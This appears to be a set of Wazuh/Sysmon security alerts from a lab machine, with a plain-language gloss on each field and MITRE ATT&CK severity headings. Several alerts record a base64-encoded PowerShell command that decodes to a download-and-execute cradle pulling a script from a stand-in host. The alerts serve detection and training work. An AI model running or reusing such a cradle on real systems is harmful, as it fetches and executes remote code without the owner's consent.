data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.600+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.600+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  44
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1272833
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:51.7105256Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283231
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:51.697 ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} ProcessId: 10808 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_is1i0e3l.l1c.ps1 CreationUtcTime: 2025-04-24 22:36:51.697 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:51.697
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd02-680a-0b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_is1i0e3l.l1c.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:51.697
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.064+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.064+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  41
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1275602
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:53.8027624Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283265
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:52.626 ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} ProcessId: 13712 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} ParentProcessId: 10808 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:52.626
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd04-680a-0f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd02-680a-0b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.079+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  45
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1283673
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:54.0658636Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283266
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:54.027 ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} ProcessId: 13712 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tav0px12.umw.ps1 CreationUtcTime: 2025-04-24 22:36:54.027 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:54.027
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd04-680a-0f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tav0px12.umw.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:54.027
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.591+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.591+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  42
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1286442
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:57.6945948Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283300
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:55.050 ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} ProcessId: 5848 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} ParentProcessId: 13712 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:55.050
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd07-680a-160b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5848
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd04-680a-0f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

